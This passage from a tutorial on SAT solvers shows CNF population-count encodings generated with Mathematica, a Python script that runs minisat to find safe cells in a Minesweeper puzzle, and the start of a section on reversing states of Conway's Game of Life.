! f) && (! b || ! e || ! g) && (! b || ! e || ! h) && (! b || ! f || ! g) && (! b || ! f || ! 
h) && (! b || ! g || ! h) && (b || c || d || e || f || g || h) && (! c || ! d || ! e) && (! c || ! d || ! f) && (! c || ! d || ! g) && (! c || ! d || ! h) && (! c || ! e || ! f) && (! 128 c || ! e || ! g) && (! c || ! e || ! h) && (! c || ! f || ! g) && (! c || ! f || ! h) && (! c || ! g || ! h) && (! d || ! e || ! f) && (! d || ! e || ! g) && (! d || ! e || ! h) && (! d || ! f || ! g) && (! d || ! f || ! h) && (! d || ! g || ! h) && (! e || ! f || ! g) && (! e || ! f || ! h) && (! e || ! g || ! h) && (! f || ! g || ! h) ThesyntaxissimilartoC/C++. Let’scheckit. IwroteaPythonfunctiontoconvertMathematica’soutputinto CNFfilewhichcanbefeededtoSATsolver: #!/usr/bin/python import subprocess def mathematica_to_CNF (s, a): s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3]) s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7]) s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "") s=s.split ("&&") return s def POPCNT2 (a): s="(!a||!b||!c)&&(!a||!b||!d)&&(!a||!b||!e)&&(!a||!b||!f)&&(!a||!b||!g)&&(!a||!b||!h)&&(!a||!c||!d)&&" \ "(!a||!c||!e)&&(!a||!c||!f)&&(!a||!c||!g)&&(!a||!c||!h)&&(!a||!d||!e)&&(!a||!d||!f)&&(!a||!d||!g)&&" \ "(!a||!d||!h)&&(!a||!e||!f)&&(!a||!e||!g)&&(!a||!e||!h)&&(!a||!f||!g)&&(!a||!f||!h)&&(!a||!g||!h)&&" \ "(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&(a||b||c||d||f||g||h)&&" \ "(a||b||c||e||f||g||h)&&(a||b||d||e||f||g||h)&&(a||c||d||e||f||g||h)&&(!b||!c||!d)&&(!b||!c||!e)&&" \ "(!b||!c||!f)&&(!b||!c||!g)&&(!b||!c||!h)&&(!b||!d||!e)&&(!b||!d||!f)&&(!b||!d||!g)&&(!b||!d||!h)&&" \ "(!b||!e||!f)&&(!b||!e||!g)&&(!b||!e||!h)&&(!b||!f||!g)&&(!b||!f||!h)&&(!b||!g||!h)&&(b||c||d||e||f||g||h) &&" \ "(!c||!d||!e)&&(!c||!d||!f)&&(!c||!d||!g)&&(!c||!d||!h)&&(!c||!e||!f)&&(!c||!e||!g)&&(!c||!e||!h)&&" \ "(!c||!f||!g)&&(!c||!f||!h)&&(!c||!g||!h)&&(!d||!e||!f)&&(!d||!e||!g)&&(!d||!e||!h)&&(!d||!f||!g)&&" \ 
"(!d||!f||!h)&&(!d||!g||!h)&&(!e||!f||!g)&&(!e||!f||!h)&&(!e||!g||!h)&&(!f||!g||!h)" return mathematica_to_CNF(s, a) clauses=POPCNT2(["1","2","3","4","5","6","7","8"]) f=open("tmp.cnf", "w") f.write ("p cnf 8 "+str(len(clauses))+"\n") for c in clauses: f.write(c+" 0\n") f.close() Itreplacesa/b/c/...variablestothevariablenamespassed(1/2/3...),reworkssyntax,etc.Hereisaresult: p cnf 8 64 -1 -2 -3 0 -1 -2 -4 0 -1 -2 -5 0 -1 -2 -6 0 -1 -2 -7 0 -1 -2 -8 0 -1 -3 -4 0 -1 -3 -5 0 -1 -3 -6 0 -1 -3 -7 0 -1 -3 -8 0 -1 -4 -5 0 -1 -4 -6 0 -1 -4 -7 0 -1 -4 -8 0 -1 -5 -6 0 -1 -5 -7 0 -1 -5 -8 0 -1 -6 -7 0 -1 -6 -8 0 -1 -7 -8 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 8 0 1 2 3 4 5 7 8 0 1 2 3 4 6 7 8 0 1 2 3 5 6 7 8 0 1 2 4 5 6 7 8 0 1 3 4 5 6 7 8 0 -2 -3 -4 0 -2 -3 -5 0 129 -2 -3 -6 0 -2 -3 -7 0 -2 -3 -8 0 -2 -4 -5 0 -2 -4 -6 0 -2 -4 -7 0 -2 -4 -8 0 -2 -5 -6 0 -2 -5 -7 0 -2 -5 -8 0 -2 -6 -7 0 -2 -6 -8 0 -2 -7 -8 0 2 3 4 5 6 7 8 0 -3 -4 -5 0 -3 -4 -6 0 -3 -4 -7 0 -3 -4 -8 0 -3 -5 -6 0 -3 -5 -7 0 -3 -5 -8 0 -3 -6 -7 0 -3 -6 -8 0 -3 -7 -8 0 -4 -5 -6 0 -4 -5 -7 0 -4 -5 -8 0 -4 -6 -7 0 -4 -6 -8 0 -4 -7 -8 0 -5 -6 -7 0 -5 -6 -8 0 -5 -7 -8 0 -6 -7 -8 0 Icanrunit: % minisat -verb=0 tst1.cnf results.txt SATISFIABLE % cat results.txt SAT 1 -2 -3 -4 -5 -6 -7 8 0 Thevariablenameinresultslackingminussignis True. Variablenamewithminussignis False. Wesee therearejusttwovariablesare True: 1and8. Thisisindeedcorrect: MiniSatsolverfoundacondition,for whichourfunctionreturns True. Zeroattheendisjustaterminalsymbolwhichmeansnothing. We can ask MiniSat for another solution, by adding current solution to the input CNF file, but with all variablesnegated: ... -5 -6 -8 0 -5 -7 -8 0 -6 -7 -8 0 -1 2 3 4 5 6 7 -8 0 InplainEnglishlanguage, thismeans“givemeANYsolutionwhichcansatisfyallclauses, butalsonot equaltothelastclausewe’vejustadded”. 
MiniSat, indeed, found another solution, again with only 2 variables equal to True:

% minisat -verb=0 tst2.cnf results.txt
SATISFIABLE
% cat results.txt
SAT
1 2 -3 -4 -5 -6 -7 -8 0

By the way, the population count function for 8 neighbours (POPCNT8) in CNF form is the simplest:

a&&b&&c&&d&&e&&f&&g&&h

Indeed: it's true if all 8 input bits are True.

The function for 0 neighbours (POPCNT0) is also simple:

!a&&!b&&!c&&!d&&!e&&!f&&!g&&!h

It means it will return True if all input variables are False.

By the way, the POPCNT1 function is also simple:

(!a||!b)&&(!a||!c)&&(!a||!d)&&(!a||!e)&&(!a||!f)&&(!a||!g)&&(!a||!h)&&(a||b||c||d||e||f||g||h)&&
(!b||!c)&&(!b||!d)&&(!b||!e)&&(!b||!f)&&(!b||!g)&&(!b||!h)&&(!c||!d)&&(!c||!e)&&(!c||!f)&&(!c||!g)&&
(!c||!h)&&(!d||!e)&&(!d||!f)&&(!d||!g)&&(!d||!h)&&(!e||!f)&&(!e||!g)&&(!e||!h)&&(!f||!g)&&(!f||!h)&&(!g||!h)

This is just an enumeration of all possible pairs of the 8 variables (a/b, a/c, a/d, etc.), which implies: no two bits may be set simultaneously in any possible pair. And there is one more clause: "(a||b||c||d||e||f||g||h)", which implies: at least one bit must be set among the 8 variables.

And yes, you can ask Mathematica to find CNF expressions for any other truth table.

11.3.2 Minesweeper

Now we can use Mathematica to generate all population count functions for 0..8 neighbours.

For a 9*9 Minesweeper matrix including an invisible border, there will be 11*11 = 121 variables, mapped to the Minesweeper matrix like this:

1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 16 17 18 19 20 21 22
23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44
...
100 101 102 103 104 105 106 107 108 109 110
111 112 113 114 115 116 117 118 119 120 121

Then we write a Python script which stacks all the population count functions: one function for each known number of neighbours (digit on the Minesweeper field). Each POPCNTx() function takes a list of variable numbers and outputs a list of clauses to be added to the final CNF file.

As for the empty cells, we also add them as clauses, but with a minus sign, which means the variable must be False. Whenever we try to place a bomb, we add its variable as a clause without a minus sign; this means the variable must be True.
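If in doubt, encodings like POPCNT1 can be sanity-checked exhaustively. The following Python sketch is mine (not from the repository): it evaluates the "all pairs" + "at least one bit" clauses directly over all 256 inputs and compares the result against an actual popcount of 1:

```python
from itertools import product

def popcnt1_cnf(a, b, c, d, e, f, g, h):
    bits = [a, b, c, d, e, f, g, h]
    # "no two bits set simultaneously": every pair has at least one zero
    pairs_ok = all(not (x and y) for i, x in enumerate(bits)
                   for y in bits[i+1:])
    # "at least one bit set among the 8 variables"
    at_least_one = any(bits)
    return pairs_ok and at_least_one

# exhaustive comparison against the intended semantics (popcount == 1)
ok = all(popcnt1_cnf(*bits) == (sum(bits) == 1)
         for bits in product([0, 1], repeat=8))
print(ok)  # True
```

The same exhaustive trick works for POPCNT2..POPCNT7; 256 cases each, so it is instant.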
Then we execute an external minisat process. The only thing we need from it is the exit code: if an input CNF is UNSAT, it returns 20.

We use here the information from the previous solving of Minesweeper: 5.11.

#!/usr/bin/python

import subprocess

WIDTH=9
HEIGHT=9
VARS_TOTAL=(WIDTH+2)*(HEIGHT+2)

known=[
"01?10001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"????1001?",
"????3101?",
"?????211?",
"?????????"]

def mathematica_to_CNF (s, a):
    s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3])
    s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7])
    s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "")
    s=s.split ("&&")
    return s

def POPCNT0 (a):
    s="!a&&!b&&!c&&!d&&!e&&!f&&!g&&!h"
    return mathematica_to_CNF(s, a)

def POPCNT1 (a):
    s="(!a||!b)&&(!a||!c)&&(!a||!d)&&(!a||!e)&&(!a||!f)&&(!a||!g)&&(!a||!h)&&(a||b||c||d||e||f||g||h)&&" \
    "(!b||!c)&&(!b||!d)&&(!b||!e)&&(!b||!f)&&(!b||!g)&&(!b||!h)&&(!c||!d)&&(!c||!e)&&(!c||!f)&&(!c||!g)&&" \
    "(!c||!h)&&(!d||!e)&&(!d||!f)&&(!d||!g)&&(!d||!h)&&(!e||!f)&&(!e||!g)&&(!e||!h)&&(!f||!g)&&(!f||!h)&&(!g||!h)"
    return mathematica_to_CNF(s, a)

def POPCNT2 (a):
    s="(!a||!b||!c)&&(!a||!b||!d)&&(!a||!b||!e)&&(!a||!b||!f)&&(!a||!b||!g)&&(!a||!b||!h)&&(!a||!c||!d)&&" \
    "(!a||!c||!e)&&(!a||!c||!f)&&(!a||!c||!g)&&(!a||!c||!h)&&(!a||!d||!e)&&(!a||!d||!f)&&(!a||!d||!g)&&" \
    "(!a||!d||!h)&&(!a||!e||!f)&&(!a||!e||!g)&&(!a||!e||!h)&&(!a||!f||!g)&&(!a||!f||!h)&&(!a||!g||!h)&&" \
    "(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&(a||b||c||d||f||g||h)&&" \
    "(a||b||c||e||f||g||h)&&(a||b||d||e||f||g||h)&&(a||c||d||e||f||g||h)&&(!b||!c||!d)&&(!b||!c||!e)&&" \
    "(!b||!c||!f)&&(!b||!c||!g)&&(!b||!c||!h)&&(!b||!d||!e)&&(!b||!d||!f)&&(!b||!d||!g)&&(!b||!d||!h)&&" \
    "(!b||!e||!f)&&(!b||!e||!g)&&(!b||!e||!h)&&(!b||!f||!g)&&(!b||!f||!h)&&(!b||!g||!h)&&(b||c||d||e||f||g||h)&&" \
    "(!c||!d||!e)&&(!c||!d||!f)&&(!c||!d||!g)&&(!c||!d||!h)&&(!c||!e||!f)&&(!c||!e||!g)&&(!c||!e||!h)&&" \
"(!c||!f||!g)&&(!c||!f||!h)&&(!c||!g||!h)&&(!d||!e||!f)&&(!d||!e||!g)&&(!d||!e||!h)&&(!d||!f||!g)&&" \ "(!d||!f||!h)&&(!d||!g||!h)&&(!e||!f||!g)&&(!e||!f||!h)&&(!e||!g||!h)&&(!f||!g||!h)" return mathematica_to_CNF(s, a) def POPCNT3 (a): s="(!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&" \ "(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&" \ "(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&" \ "(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&" \ "(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&(!a||!c||!g||!h)&&" \ "(!a||!d||!e||!f)&&(!a||!d||!e||!g)&&(!a||!d||!e||!h)&&(!a||!d||!f||!g)&&(!a||!d||!f||!h)&&" \ "(!a||!d||!g||!h)&&(!a||!e||!f||!g)&&(!a||!e||!f||!h)&&(!a||!e||!g||!h)&&(!a||!f||!g||!h)&&" \ "(a||b||c||d||e||f)&&(a||b||c||d||e||g)&&(a||b||c||d||e||h)&&(a||b||c||d||f||g)&&(a||b||c||d||f||h)&&" \ "(a||b||c||d||g||h)&&(a||b||c||e||f||g)&&(a||b||c||e||f||h)&&(a||b||c||e||g||h)&&(a||b||c||f||g||h)&&" \ "(a||b||d||e||f||g)&&(a||b||d||e||f||h)&&(a||b||d||e||g||h)&&(a||b||d||f||g||h)&&(a||b||e||f||g||h)&&" \ "(a||c||d||e||f||g)&&(a||c||d||e||f||h)&&(a||c||d||e||g||h)&&(a||c||d||f||g||h)&&(a||c||e||f||g||h)&&" \ "(a||d||e||f||g||h)&&(!b||!c||!d||!e)&&(!b||!c||!d||!f)&&(!b||!c||!d||!g)&&(!b||!c||!d||!h)&&" \ "(!b||!c||!e||!f)&&(!b||!c||!e||!g)&&(!b||!c||!e||!h)&&(!b||!c||!f||!g)&&(!b||!c||!f||!h)&&" \ "(!b||!c||!g||!h)&&(!b||!d||!e||!f)&&(!b||!d||!e||!g)&&(!b||!d||!e||!h)&&(!b||!d||!f||!g)&&" \ "(!b||!d||!f||!h)&&(!b||!d||!g||!h)&&(!b||!e||!f||!g)&&(!b||!e||!f||!h)&&(!b||!e||!g||!h)&&" \ "(!b||!f||!g||!h)&&(b||c||d||e||f||g)&&(b||c||d||e||f||h)&&(b||c||d||e||g||h)&&(b||c||d||f||g||h)&&" \ "(b||c||e||f||g||h)&&(b||d||e||f||g||h)&&(!c||!d||!e||!f)&&(!c||!d||!e||!g)&&(!c||!d||!e||!h)&&" \ 
"(!c||!d||!f||!g)&&(!c||!d||!f||!h)&&(!c||!d||!g||!h)&&(!c||!e||!f||!g)&&(!c||!e||!f||!h)&&" \ "(!c||!e||!g||!h)&&(!c||!f||!g||!h)&&(c||d||e||f||g||h)&&(!d||!e||!f||!g)&&(!d||!e||!f||!h)&&" \ "(!d||!e||!g||!h)&&(!d||!f||!g||!h)&&(!e||!f||!g||!h)" return mathematica_to_CNF(s, a) def POPCNT4 (a): s="(!a||!b||!c||!d||!e)&&(!a||!b||!c||!d||!f)&&(!a||!b||!c||!d||!g)&&(!a||!b||!c||!d||!h)&&" \ "(!a||!b||!c||!e||!f)&&(!a||!b||!c||!e||!g)&&(!a||!b||!c||!e||!h)&&(!a||!b||!c||!f||!g)&&" \ "(!a||!b||!c||!f||!h)&&(!a||!b||!c||!g||!h)&&(!a||!b||!d||!e||!f)&&(!a||!b||!d||!e||!g)&&" \ "(!a||!b||!d||!e||!h)&&(!a||!b||!d||!f||!g)&&(!a||!b||!d||!f||!h)&&(!a||!b||!d||!g||!h)&&" \ "(!a||!b||!e||!f||!g)&&(!a||!b||!e||!f||!h)&&(!a||!b||!e||!g||!h)&&(!a||!b||!f||!g||!h)&&" \ "(!a||!c||!d||!e||!f)&&(!a||!c||!d||!e||!g)&&(!a||!c||!d||!e||!h)&&(!a||!c||!d||!f||!g)&&" \ "(!a||!c||!d||!f||!h)&&(!a||!c||!d||!g||!h)&&(!a||!c||!e||!f||!g)&&(!a||!c||!e||!f||!h)&&" \ "(!a||!c||!e||!g||!h)&&(!a||!c||!f||!g||!h)&&(!a||!d||!e||!f||!g)&&(!a||!d||!e||!f||!h)&&" \ "(!a||!d||!e||!g||!h)&&(!a||!d||!f||!g||!h)&&(!a||!e||!f||!g||!h)&&(a||b||c||d||e)&&(a||b||c||d||f)&&" \ "(a||b||c||d||g)&&(a||b||c||d||h)&&(a||b||c||e||f)&&(a||b||c||e||g)&&(a||b||c||e||h)&&(a||b||c||f||g)&&" \ "(a||b||c||f||h)&&(a||b||c||g||h)&&(a||b||d||e||f)&&(a||b||d||e||g)&&(a||b||d||e||h)&&(a||b||d||f||g)&&" \ "(a||b||d||f||h)&&(a||b||d||g||h)&&(a||b||e||f||g)&&(a||b||e||f||h)&&(a||b||e||g||h)&&(a||b||f||g||h)&&" \ "(a||c||d||e||f)&&(a||c||d||e||g)&&(a||c||d||e||h)&&(a||c||d||f||g)&&(a||c||d||f||h)&&(a||c||d||g||h)&&" \ "(a||c||e||f||g)&&(a||c||e||f||h)&&(a||c||e||g||h)&&(a||c||f||g||h)&&(a||d||e||f||g)&&(a||d||e||f||h)&&" \ "(a||d||e||g||h)&&(a||d||f||g||h)&&(a||e||f||g||h)&&(!b||!c||!d||!e||!f)&&(!b||!c||!d||!e||!g)&&" \ "(!b||!c||!d||!e||!h)&&(!b||!c||!d||!f||!g)&&(!b||!c||!d||!f||!h)&&(!b||!c||!d||!g||!h)&&" \ "(!b||!c||!e||!f||!g)&&(!b||!c||!e||!f||!h)&&(!b||!c||!e||!g||!h)&&(!b||!c||!f||!g||!h)&&" \ 
"(!b||!d||!e||!f||!g)&&(!b||!d||!e||!f||!h)&&(!b||!d||!e||!g||!h)&&(!b||!d||!f||!g||!h)&&" \ "(!b||!e||!f||!g||!h)&&(b||c||d||e||f)&&(b||c||d||e||g)&&(b||c||d||e||h)&&(b||c||d||f||g)&&" \ "(b||c||d||f||h)&&(b||c||d||g||h)&&(b||c||e||f||g)&&(b||c||e||f||h)&&(b||c||e||g||h)&&" \ "(b||c||f||g||h)&&(b||d||e||f||g)&&(b||d||e||f||h)&&(b||d||e||g||h)&&(b||d||f||g||h)&&" \ "(b||e||f||g||h)&&(!c||!d||!e||!f||!g)&&(!c||!d||!e||!f||!h)&&(!c||!d||!e||!g||!h)&&" \ "(!c||!d||!f||!g||!h)&&(!c||!e||!f||!g||!h)&&(c||d||e||f||g)&&(c||d||e||f||h)&&(c||d||e||g||h)&&" \ "(c||d||f||g||h)&&(c||e||f||g||h)&&(!d||!e||!f||!g||!h)&&(d||e||f||g||h)" return mathematica_to_CNF(s, a) def POPCNT5 (a): s="(!a||!b||!c||!d||!e||!f)&&(!a||!b||!c||!d||!e||!g)&&(!a||!b||!c||!d||!e||!h)&&" \ "(!a||!b||!c||!d||!f||!g)&&(!a||!b||!c||!d||!f||!h)&&(!a||!b||!c||!d||!g||!h)&&" \ "(!a||!b||!c||!e||!f||!g)&&(!a||!b||!c||!e||!f||!h)&&(!a||!b||!c||!e||!g||!h)&&" \ "(!a||!b||!c||!f||!g||!h)&&(!a||!b||!d||!e||!f||!g)&&(!a||!b||!d||!e||!f||!h)&&" \ 132 "(!a||!b||!d||!e||!g||!h)&&(!a||!b||!d||!f||!g||!h)&&(!a||!b||!e||!f||!g||!h)&&" \ "(!a||!c||!d||!e||!f||!g)&&(!a||!c||!d||!e||!f||!h)&&(!a||!c||!d||!e||!g||!h)&&" \ "(!a||!c||!d||!f||!g||!h)&&(!a||!c||!e||!f||!g||!h)&&(!a||!d||!e||!f||!g||!h)&&" \ "(a||b||c||d)&&(a||b||c||e)&&(a||b||c||f)&&(a||b||c||g)&&(a||b||c||h)&&(a||b||d||e)&&" \ "(a||b||d||f)&&(a||b||d||g)&&(a||b||d||h)&&(a||b||e||f)&&(a||b||e||g)&&(a||b||e||h)&&" \ "(a||b||f||g)&&(a||b||f||h)&&(a||b||g||h)&&(a||c||d||e)&&(a||c||d||f)&&(a||c||d||g)&&" \ "(a||c||d||h)&&(a||c||e||f)&&(a||c||e||g)&&(a||c||e||h)&&(a||c||f||g)&&(a||c||f||h)&&" \ "(a||c||g||h)&&(a||d||e||f)&&(a||d||e||g)&&(a||d||e||h)&&(a||d||f||g)&&(a||d||f||h)&&" \ "(a||d||g||h)&&(a||e||f||g)&&(a||e||f||h)&&(a||e||g||h)&&(a||f||g||h)&&(!b||!c||!d||!e||!f||!g)&&" \ "(!b||!c||!d||!e||!f||!h)&&(!b||!c||!d||!e||!g||!h)&&(!b||!c||!d||!f||!g||!h)&&" \ "(!b||!c||!e||!f||!g||!h)&&(!b||!d||!e||!f||!g||!h)&&(b||c||d||e)&&(b||c||d||f)&&" \ 
"(b||c||d||g)&&(b||c||d||h)&&(b||c||e||f)&&(b||c||e||g)&&(b||c||e||h)&&(b||c||f||g)&&" \ "(b||c||f||h)&&(b||c||g||h)&&(b||d||e||f)&&(b||d||e||g)&&(b||d||e||h)&&(b||d||f||g)&&" \ "(b||d||f||h)&&(b||d||g||h)&&(b||e||f||g)&&(b||e||f||h)&&(b||e||g||h)&&(b||f||g||h)&&" \ "(!c||!d||!e||!f||!g||!h)&&(c||d||e||f)&&(c||d||e||g)&&(c||d||e||h)&&(c||d||f||g)&&" \ "(c||d||f||h)&&(c||d||g||h)&&(c||e||f||g)&&(c||e||f||h)&&(c||e||g||h)&&(c||f||g||h)&&" \ "(d||e||f||g)&&(d||e||f||h)&&(d||e||g||h)&&(d||f||g||h)&&(e||f||g||h)" return mathematica_to_CNF(s, a) def POPCNT6 (a): s="(!a||!b||!c||!d||!e||!f||!g)&&(!a||!b||!c||!d||!e||!f||!h)&&(!a||!b||!c||!d||!e||!g||!h)&&" \ "(!a||!b||!c||!d||!f||!g||!h)&&(!a||!b||!c||!e||!f||!g||!h)&&(!a||!b||!d||!e||!f||!g||!h)&&" \ "(!a||!c||!d||!e||!f||!g||!h)&&(a||b||c)&&(a||b||d)&&(a||b||e)&&(a||b||f)&&(a||b||g)&&(a||b||h)&&" \ "(a||c||d)&&(a||c||e)&&(a||c||f)&&(a||c||g)&&(a||c||h)&&(a||d||e)&&(a||d||f)&&(a||d||g)&&" \ "(a||d||h)&&(a||e||f)&&(a||e||g)&&(a||e||h)&&(a||f||g)&&(a||f||h)&&(a||g||h)&&" \ "(!b||!c||!d||!e||!f||!g||!h)&&(b||c||d)&&(b||c||e)&&(b||c||f)&&(b||c||g)&&(b||c||h)&&(b||d||e)&&" \ "(b||d||f)&&(b||d||g)&&(b||d||h)&&(b||e||f)&&(b||e||g)&&(b||e||h)&&(b||f||g)&&(b||f||h)&&(b||g||h)&&" \ "(c||d||e)&&(c||d||f)&&(c||d||g)&&(c||d||h)&&(c||e||f)&&(c||e||g)&&(c||e||h)&&(c||f||g)&&(c||f||h)&&" \ "(c||g||h)&&(d||e||f)&&(d||e||g)&&(d||e||h)&&(d||f||g)&&(d||f||h)&&(d||g||h)&&" \ "(e||f||g)&&(e||f||h)&&(e||g||h)&&(f||g||h)" return mathematica_to_CNF(s, a) def POPCNT7 (a): s="(!a||!b||!c||!d||!e||!f||!g||!h)&&(a||b)&&(a||c)&&(a||d)&&(a||e)&&(a||f)&&(a||g)&&(a||h)&&(b||c)&&" \ "(b||d)&&(b||e)&&(b||f)&&(b||g)&&(b||h)&&(c||d)&&(c||e)&&(c||f)&&(c||g)&&(c||h)&&(d||e)&&(d||f)&&(d||g)&&" \ "(d||h)&&(e||f)&&(e||g)&&(e||h)&&(f||g)&&(f||h)&&(g||h)" return mathematica_to_CNF(s, a) def POPCNT8 (a): s="a&&b&&c&&d&&e&&f&&g&&h" return mathematica_to_CNF(s, a) POPCNT_functions=[POPCNT0, POPCNT1, POPCNT2, POPCNT3, POPCNT4, POPCNT5, POPCNT6, POPCNT7, POPCNT8] def 
coords_to_var (row, col):
    # we always use SAT variables as strings, anyway.
    # the 1st variable is 1, not 0
    return str(row*(WIDTH+2)+col+1)

def chk_bomb(row, col):
    clauses=[]

    # make empty border
    # all variables are negated (because they must be False)
    for c in range(WIDTH+2):
        clauses.append ("-"+coords_to_var(0,c))
        clauses.append ("-"+coords_to_var(HEIGHT+1,c))
    for r in range(HEIGHT+2):
        clauses.append ("-"+coords_to_var(r,0))
        clauses.append ("-"+coords_to_var(r,WIDTH+1))

    for r in range(1,HEIGHT+1):
        for c in range(1,WIDTH+1):
            t=known[r-1][c-1]
            if t in "012345678":
                # cell at r, c is empty (False):
                clauses.append ("-"+coords_to_var(r,c))
                # we need an empty border so the following expression would work for all possible cells:
                neighbours=[coords_to_var(r-1, c-1), coords_to_var(r-1, c), coords_to_var(r-1, c+1),
                    coords_to_var(r, c-1), coords_to_var(r, c+1),
                    coords_to_var(r+1, c-1), coords_to_var(r+1, c), coords_to_var(r+1, c+1)]
                clauses=clauses+POPCNT_functions[int(t)](neighbours)

    # place a bomb
    clauses.append (coords_to_var(row,col))

    f=open("tmp.cnf", "w")
    f.write ("p cnf "+str(VARS_TOTAL)+" "+str(len(clauses))+"\n")
    for c in clauses:
        f.write(c+" 0\n")
    f.close()

    child = subprocess.Popen(["minisat", "tmp.cnf"], stdout=subprocess.PIPE)
    child.wait()
    # 10 is SAT, 20 is UNSAT
    if child.returncode==20:
        print "row=%d, col=%d, unsat!" % (row, col)

for r in range(1,HEIGHT+1):
    for c in range(1,WIDTH+1):
        if known[r-1][c-1]=="?":
            chk_bomb(r, c)

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/minesweeper/minesweeper_SAT.py)

The output CNF file can be large, up to 2000 clauses or more; here is an example: https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/minesweeper/sample.cnf.

Anyway, it works just like my previous Z3Py script:

row=1, col=3, unsat!
row=6, col=2, unsat!
row=6, col=3, unsat!
row=7, col=4, unsat!
row=7, col=9, unsat!
row=8, col=9, unsat!
...but it runs way faster, even considering the overhead of executing an external program. Perhaps the Z3Py version could be optimized much better?

The files, including the Wolfram Mathematica notebook: https://github.com/dennis714/SAT_SMT_article/tree/master/SAT/minesweeper .

11.4 Conway's "Game of Life"

11.4.1 Reversing back state of "Game of Life"

How could we reverse back a known state of GoL? This can be solved by brute force, but that is extremely slow and inefficient.

Let's try to use a SAT solver. First, we need to define a function which will tell if a new cell will be created/born, preserved/stay, or die. Quick refresher: a cell is born if it has 3 neighbours, it stays alive if it has 2 or 3 neighbours, and it dies in any other case.

This is how I can define a function reflecting the state of a new cell in the next state:

if center==true:
    return popcnt2(neighbours) || popcnt3(neighbours)
if center==false:
    return popcnt3(neighbours)

We can get rid of the "if" construction:

result=(center==true && (popcnt2(neighbours) || popcnt3(neighbours))) || (center==false && popcnt3(neighbours))

...where "center" is the state of the central cell, "neighbours" are the 8 neighbouring cells, popcnt2 is a function which returns True if exactly 2 of its input bits are set, and popcnt3 is the same but for 3 bits (just like those used in my "Minesweeper" example (11.3)).
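As a quick reference model, the rule above can also be written directly in Python (a test sketch of mine, not the book's code; `neighbours` here is a plain list of eight 0/1 values):

```python
def newcell(center, neighbours):
    """Next state of a GoL cell: born with 3 neighbours,
    survives with 2 or 3, dies otherwise."""
    n = sum(neighbours)
    if center:
        return n == 2 or n == 3   # popcnt2 || popcnt3
    return n == 3                 # popcnt3

# a live cell with exactly 3 live neighbours stays alive:
print(newcell(True, [1, 1, 1, 0, 0, 0, 0, 0]))   # True
# a dead cell with only 2 live neighbours stays dead:
print(newcell(False, [1, 1, 0, 0, 0, 0, 0, 0]))  # False
```

Such a plain-Python model is handy for cross-checking whatever CNF encoding the solver ends up using.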
Using Wolfram Mathematica, I first create all helper functions and a truth table for the function which returns true if a cell must be present in the next state, or false if not:

In[1]:= popcount[n_Integer]:=IntegerDigits[n,2] // Total
In[2]:= popcount2[n_Integer]:=Equal[popcount[n],2]
In[3]:= popcount3[n_Integer]:=Equal[popcount[n],3]
In[4]:= newcell[center_Integer,neighbours_Integer]:=(center==1 && (popcount2[neighbours]||popcount3[neighbours]))||(center==0 && popcount3[neighbours])
In[13]:= NewCellIsTrue=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]] -> Boole[newcell[center,neighbours]],{neighbours,0,255},{center,0,1}]]
Out[13]= {{0,0,0,0,0,0,0,0,0}->0,
{1,0,0,0,0,0,0,0,0}->0,
{0,0,0,0,0,0,0,0,1}->0,
{1,0,0,0,0,0,0,0,1}->0,
{0,0,0,0,0,0,0,1,0}->0,
{1,0,0,0,0,0,0,1,0}->0,
{0,0,0,0,0,0,0,1,1}->0,
{1,0,0,0,0,0,0,1,1}->1,
...

Now we can create a CNF expression out of the truth table:

In[14]:= BooleanConvert[BooleanFunction[NewCellIsTrue,{center,a,b,c,d,e,f,g,h}],"CNF"]
Out[14]= (!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&
(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&
(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&
(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&
(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&
...

Also, we need a second function, an inverted one, which will return true if the cell must be absent in the next state, or false otherwise:

In[15]:= NewCellIsFalse=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]] -> Boole[Not[newcell[center,neighbours]]],{neighbours,0,255},{center,0,1}]]
Out[15]= {{0,0,0,0,0,0,0,0,0}->1,
{1,0,0,0,0,0,0,0,0}->1,
{0,0,0,0,0,0,0,0,1}->1,
{1,0,0,0,0,0,0,0,1}->1,
{0,0,0,0,0,0,0,1,0}->1,
...
